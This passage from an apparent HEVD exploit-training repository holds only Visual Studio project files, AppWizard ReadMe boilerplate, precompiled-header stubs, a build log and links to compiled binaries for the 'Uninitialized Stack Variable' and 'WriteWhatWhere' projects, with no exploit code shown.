 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="HEVD-Unitialized-Stack-Variable.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD-Unitialized-Stack-Variable.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD-Unitialized-Stack-Variable Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD-Unitialized-Stack-Variable application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD-Unitialized-Stack-Variable application.
 9 | 
10 | 
11 | HEVD-Unitialized-Stack-Variable.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD-Unitialized-Stack-Variable.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD-Unitialized-Stack-Variable.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD-Unitialized-Stack-Variable.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD-Unitialized-Stack-Variable.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-Unitialized-Stack-Variable/HEVD-Unitialized-Stack-Variable/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.exe


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.pdb


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WriteWhatWhere-Exploit", "WriteWhatWhere-Exploit\WriteWhatWhere-Exploit.vcxproj", "{27C6C108-DC57-4E00-98A4-DE2991218494}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Debug|x64.Build.0 = Debug|x64
18 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Debug|x86.Build.0 = Debug|Win32
20 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Release|x64.ActiveCfg = Release|x64
21 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Release|x64.Build.0 = Release|x64
22 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Release|x86.ActiveCfg = Release|Win32
23 | 		{27C6C108-DC57-4E00-98A4-DE2991218494}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/WriteWhatWhere-Exploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\WriteWhatWhere-Exploit\|
3 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWha.27C6C108.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.log:
--------------------------------------------------------------------------------
1 |   WriteWhatWhere-Exploit.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\writewhatwhere-exploit\writewhatwhere-exploit\writewhatwhere-exploit.cpp(71): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'HANDLE'
3 | c:\users\gwilcox\documents\visual studio 2017\projects\writewhatwhere-exploit\writewhatwhere-exploit\writewhatwhere-exploit.cpp(103): warning C4477: 'printf' : format string '%x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'LPVOID'
4 |   WriteWhatWhere-Exploit.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\WriteWhatWhere-Exploit\Debug\WriteWhatWhere-Exploit.exe
5 |   WriteWhatWhere-Exploit.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\WriteWhatWhere-Exploit\Debug\WriteWhatWhere-Exploit.pdb (Partial PDB)
6 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.obj


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/WriteWhatWhere-Exploit.pch


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/writewhatwhere-exploit.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/Debug/writewhatwhere-exploit.obj.enc


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : WriteWhatWhere-Exploit Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this WriteWhatWhere-Exploit application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your WriteWhatWhere-Exploit application.
 9 | 
10 | 
11 | WriteWhatWhere-Exploit.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | WriteWhatWhere-Exploit.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | WriteWhatWhere-Exploit.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named WriteWhatWhere-Exploit.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/WriteWhatWhere-Exploit.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{27C6C108-DC57-4E00-98A4-DE2991218494}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>WriteWhatWhereExploit</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
